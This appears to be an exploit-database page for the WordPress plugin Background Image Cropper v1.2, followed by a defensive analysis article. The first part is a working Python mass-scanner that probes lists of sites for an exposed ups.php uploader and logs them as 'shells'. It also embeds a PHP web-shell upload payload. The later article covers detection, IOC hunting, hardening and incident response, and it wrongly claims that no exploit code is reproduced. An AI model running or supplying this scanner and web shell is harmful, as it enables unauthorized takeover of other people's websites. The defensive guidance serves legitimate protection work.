Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution

Exploit Author: Milad Karimi
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: Python
Published Date: 2024-04-21
# Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
# Date: 2024-04-16
# Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/plugins/background-image-cropper/
# Version: 1.2
# Category : webapps
# Tested on: windows 10 , firefox

import sys, requests, re
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)
# Colour codes used in the status output; the original referenced fg/fr/fc without defining them
fg = Fore.GREEN
fr = Fore.RED
fc = Fore.CYAN
shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo
"<form method='post' enctype='multipart/form-data'> <input type='file'
name='zb'><input type='submit' name='upload' value='upload'></form>";
if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'],
$_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to
Upload."; } } ?>"""
requests.urllib3.disable_warnings()
headers = {'Connection': 'keep-alive',
           'Cache-Control': 'max-age=0',
           'Upgrade-Insecure-Requests': '1',
           'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
           'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
           'Accept-Encoding': 'gzip, deflate',
           'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
           'referer': 'www.google.com'}
try:
    target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
    path = str(sys.argv[0]).split('\\')
    exit('\n  [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')

def URLdomain(site):
    if site.startswith("http://") :
        site = site.replace("http://","")
    elif site.startswith("https://") :
        site = site.replace("https://","")
    else :
        pass
    pattern = re.compile('(.*)/')
    while re.findall(pattern,site):
        sitez = re.findall(pattern,site)
        site = sitez[0]
    return site


def FourHundredThree(url):
    # Fingerprint of the upload form served by ups.php; its presence marks the site as affected
    marker = ('enctype="multipart/form-data" name="uploader" id="uploader">'
              '<input type="file" name="file" size="50">'
              '<input name="_upl" type="submit" id="_upl" value="Upload')
    handler = '/wp-content/plugins/background-image-cropper/ups.php'
    try:
        url = 'http://' + URLdomain(url)
        check = requests.get(url + handler, headers=headers, allow_redirects=True, timeout=15)
        if marker in check.content:
            print ' -| ' + url + ' --> {}[Successfully]'.format(fg)
            open('Shells.txt', 'a').write(url + handler + '\n')
        else:
            # Retry over HTTPS before giving up on the host
            url = 'https://' + URLdomain(url)
            check = requests.get(url + handler, headers=headers, allow_redirects=True, verify=False, timeout=15)
            if marker in check.content:
                print ' -| ' + url + ' --> {}[Successfully]'.format(fg)
                open('Shells.txt', 'a').write(url + handler + '\n')
            else:
                print ' -| ' + url + ' --> {}[Failed]'.format(fr)
    except:
        print ' -| ' + url + ' --> {}[Failed]'.format(fr)

mp = Pool(150)
mp.map(FourHundredThree, target)
mp.close()
mp.join()

print '\n [!] {}Saved in Shells.txt'.format(fc)


WordPress Plugin "Background Image Cropper" v1.2 — Remote Code Execution (RCE): Analysis, Impact, and Mitigation

This article explains the security issue reported in the Background Image Cropper WordPress plugin (v1.2), describes the real-world impact of an unauthenticated remote code execution (RCE) vulnerability, and provides practical, defensive guidance for administrators and incident responders. The content focuses on detection, containment, remediation, and long-term hardening — without reproducing exploit code or step-by-step attack procedures.

Summary of the Vulnerability

In affected versions of the Background Image Cropper plugin (reported in version 1.2), an unauthenticated file upload endpoint (commonly referenced as ups.php in public reports) was present in the plugin distribution. Because the endpoint lacked proper authentication, file-type validation, and safe storage/execution controls, it allowed an attacker to upload arbitrary files that could result in remote code execution when the uploaded file was executed by the web server.

Why this is serious

  • Remote Code Execution: An attacker who can upload a PHP or other executable file can execute commands on the server, leading to site takeover.
  • Persistence and Lateral Movement: Uploaded backdoors or web shells enable persistent access and can be used to move laterally to other sites on the same host.
  • Data Theft and Tampering: Database exfiltration, credential theft, and unauthorized modification of site content are typical consequences.
  • Reputation and SEO Damage: Compromised sites are often used to serve malware or phishing pages, harming site visitors and SEO ranking.

Who should care

  • Site owners using Background Image Cropper (or similar image/background plugins).
  • Hosting providers that host multiple WordPress instances.
  • Security teams performing vulnerability management, incident response, or threat hunting.

Detection: How to check if your site is affected (defensive methods)

Do not attempt to exploit the vulnerability. Use the following defensive checks to determine exposure and scope. Prefer checking files and configurations via your host control panel, SFTP, or server shell (for which you have authorization).

1. Verify plugin version via WP-Admin or WP-CLI

# List installed plugins and versions (requires WP-CLI & proper permissions)
wp plugin list

Explanation: wp plugin list shows installed plugins and version numbers so you can confirm whether Background Image Cropper is present and which version is installed.

2. Check for suspicious plugin files in the filesystem

# Example (run on the server as the site owner or admin):
ls -la wp-content/plugins/background-image-cropper/

Explanation: Inspect the plugin directory to see if unexpected files (for example, an upload handler named ups.php or similar) are present. If you find files you do not recognize, investigate their contents and timestamps.

3. Use safe, read-only HTTP checks (only when you manage the site)

# Request the plugin upload file page — use HEAD or GET carefully:
curl -I https://example.com/wp-content/plugins/background-image-cropper/ups.php

Explanation: A HEAD request can reveal whether the file exists without attempting uploads. Only perform HTTP checks against sites you control or have explicit permission to test.

4. Hunting for indicators of compromise (IOC)

  • Search for recently modified/created PHP files under wp-content/uploads (web-accessible upload directories).
  • Review access logs for suspicious POST requests targeting plugin paths.
  • Look for new administrative users or unexpected scheduled tasks (cron jobs).
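The IOC hunt above, as an added POSIX shell example that is not part of the original page or the plugin: it flags POST requests to the plugin's upload handler in a combined-format access log and lists PHP files sitting under an uploads directory. The log lines, the uploads tree and the function names are constructed for this example.

```shell
#!/bin/sh
# Defensive IOC hunt for the Background Image Cropper upload handler.
# All sample data below is constructed; the helper names are this example's own.

# Print every POST to the plugin's upload handler (client IP, timestamp and request
# are kept on the line for triage); the existence-check GETs are not reported.
find_upload_posts() {
    grep -E '"POST /wp-content/plugins/background-image-cropper/[^ "]*' "$1"
}

# Number of such POSTs, as a bare integer.
count_upload_posts() {
    find_upload_posts "$1" | wc -l | tr -d ' '
}

# PHP files under a web-accessible uploads directory should not exist at all.
find_php_in_uploads() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' \)
}

# --- constructed sample input ---
TMP=$(mktemp -d)
trap 'rm -rf "$TMP"' EXIT
cat > "$TMP/access.log" <<'EOF'
203.0.113.5 - - [16/Apr/2024:10:01:02 +0000] "GET /wp-login.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.9 - - [16/Apr/2024:10:02:15 +0000] "GET /wp-content/plugins/background-image-cropper/ups.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [16/Apr/2024:10:02:20 +0000] "POST /wp-content/plugins/background-image-cropper/ups.php HTTP/1.1" 200 640 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Apr/2024:10:05:41 +0000] "POST /wp-content/plugins/background-image-cropper/ups.php HTTP/1.1" 200 640 "-" "curl/8.0"
203.0.113.5 - - [16/Apr/2024:10:06:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
EOF
mkdir -p "$TMP/uploads/2024/04"
: > "$TMP/uploads/2024/04/banner.jpg"
: > "$TMP/uploads/2024/04/cropped-banner.php"   # a PHP file in uploads is an IOC

echo "POSTs to the upload handler:"
find_upload_posts "$TMP/access.log"
echo "PHP files under uploads:"
find_php_in_uploads "$TMP/uploads"
```

On a real host, point the functions at the live access log and wp-content/uploads, and treat any hit as a reason to collect evidence before cleaning up.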

Containment and Immediate Response

  • Temporarily take the site offline or put it in maintenance mode if you observe active compromise.
  • Disconnect affected systems from the network if server-level compromise is suspected.
  • Change all WordPress administrator and hosting control panel passwords after containment.
  • Preserve logs and filesystem snapshots for forensic analysis before making destructive changes.

Remediation and Recovery

1. Update or remove the plugin

If a patched version is available from a trusted source (WordPress.org), update immediately. If the plugin is unmaintained or no safe update exists, uninstall and delete the plugin files.

2. Remove malicious artifacts

After containment and evidence collection, remove unwanted upload handlers (e.g., ups.php) and any known web shells or unknown PHP files found in uploads or plugin directories.

3. Restore clean backups

If the site was compromised, restoring from a clean backup taken before the compromise is the quickest path to recovery. Ensure the backup is verified and patched after restoration.

4. Patch and harden the server

  • Apply WordPress core, theme, and plugin updates promptly.
  • Harden file permissions and ownership — ensure the webserver user cannot write to plugin and core code directories.
  • Disable risky PHP functions if your application does not need them (e.g., exec, system, passthru) via php.ini or host controls.

Preventive Controls and Long-Term Hardening

  • Use a Web Application Firewall (WAF) to block suspicious upload attempts and to create rules limiting access to known vulnerable endpoints.
  • Disable PHP execution in upload directories (see example below).
  • Adopt least-privilege file permissions; run sites in isolated containers or per-site user accounts.
  • Monitor file integrity (e.g., tripwire-like tools) and enable logging/alerting for changes to plugin directories.
  • Vet plugins before installation: check plugin reviews, last update date, and whether the author responds to security reports.
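The file-integrity monitoring recommended above, and the "inspect the plugin directory for unexpected files" check from the detection section, as an added POSIX shell example that is not part of the original page or the plugin: a checksum baseline of a plugin directory and a diff that reports new or modified files. The plugin tree, file contents and helper names are constructed for this example.

```shell
#!/bin/sh
# Minimal file-integrity baseline for a plugin directory. Sample tree is constructed;
# the helper names are this example's own.

# One "checksum size ./path" line per file, sorted so snapshots can be compared.
# cksum is POSIX; substitute sha256sum where available for a collision-resistant digest.
snapshot_dir() {
    ( cd "$1" && find . -type f | sort | while IFS= read -r f; do
        cksum "$f"
    done )
}

# Print the path of every file that is new or whose content differs from the baseline.
# Deleted files are not reported; compare the two snapshots with diff for those.
changed_since() {
    baseline="$1"; dir="$2"
    snapshot_dir "$dir" | while IFS= read -r line; do
        grep -qxF "$line" "$baseline" || echo "${line##* }"
    done
}

count_changed() {
    changed_since "$1" "$2" | wc -l | tr -d ' '
}

# --- constructed sample plugin directory ---
TMP=$(mktemp -d)
trap 'rm -rf "$TMP"' EXIT
PLUGIN="$TMP/background-image-cropper"
mkdir -p "$PLUGIN/assets"
printf '<?php // plugin bootstrap\n' > "$PLUGIN/background-image-cropper.php"
printf 'body{}\n' > "$PLUGIN/assets/style.css"
snapshot_dir "$PLUGIN" > "$TMP/baseline.txt"   # taken right after a clean install

# Later: an unexpected upload handler appears and a shipped file is altered.
printf '<?php // unexpected handler\n' > "$PLUGIN/ups.php"
printf '<?php // altered bootstrap\n' > "$PLUGIN/background-image-cropper.php"

echo "Files new or changed since baseline:"
changed_since "$TMP/baseline.txt" "$PLUGIN"
```

Store the baseline outside the web root (or off-host) so that an attacker with write access to the plugin directory cannot simply regenerate it.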

Example: Prevent PHP execution in uploads (Apache)

# Place this in a site-specific Apache configuration, wrapped in a <Directory> block
# scoped to wp-content/uploads/, or in a .htaccess inside wp-content/uploads/.
# Note: php_admin_flag is only accepted in the server configuration; in a .htaccess
# file use "php_flag engine Off" instead, otherwise Apache returns a 500 error.

<IfModule mod_php7.c>
  php_admin_flag engine Off
</IfModule>

# Deny execution of PHP files by default (Apache 2.4 syntax)
<FilesMatch "\.php$">
  Require all denied
</FilesMatch>

Explanation: This configuration disables the PHP engine for the uploads directory and denies direct access to PHP files placed there. Use the correct mod_php module name for your environment (e.g., mod_php7.c or mod_php8.c). If PHP runs through PHP-FPM rather than mod_php, the engine flag has no effect and the FilesMatch block (or an equivalent rule in the FPM/proxy configuration) is what carries the protection. Test changes in a staging environment before applying to production.

Example: Recommended PHP hardening (php.ini)

; Disable risky functions if not required by your application
disable_functions = exec,passthru,shell_exec,system,proc_open,popen

Explanation: Disabling potentially dangerous PHP functions reduces the impact of successful code execution. This is a defense-in-depth measure and should be evaluated against application requirements.

Incident Response Checklist

Task                                               | Purpose
---------------------------------------------------|-------------------------------------------
Isolate affected host                              | Prevent further access and lateral spread
Collect logs and filesystem snapshots              | Preserve evidence for investigation
Scan for web shells and unexpected PHP files       | Identify persistence mechanisms
Rotate credentials (WP, DB, hosting)               | Remove attacker access
Restore from verified backup                       | Return to clean state
Apply patches and hardening                        | Prevent re-infection
Report findings to plugin maintainer/WordPress.org | Help protect other users

Responsible Disclosure and Reporting

If you find evidence of compromise related to this vulnerability or discover a vulnerable installation, follow coordinated disclosure practices:

  • Contact the plugin author/maintainer via the plugin’s WordPress.org support/patch channels.
  • If the plugin is hosted on WordPress.org, use the official disclosure process so a security update can be published.
  • If you are a hosting provider and detect widespread exploitation, consider informing affected customers and offering remediation assistance.

Final Recommendations (Executive)

  • Immediately verify whether Background Image Cropper is installed and which version is running.
  • If you manage affected sites, prioritize patching or removal and conduct an incident response if compromise is suspected.
  • Apply the preventive controls listed above (WAF, disable PHP in uploads, principle of least privilege).
  • Maintain a tested backup-and-restore process and monitor for suspicious file changes.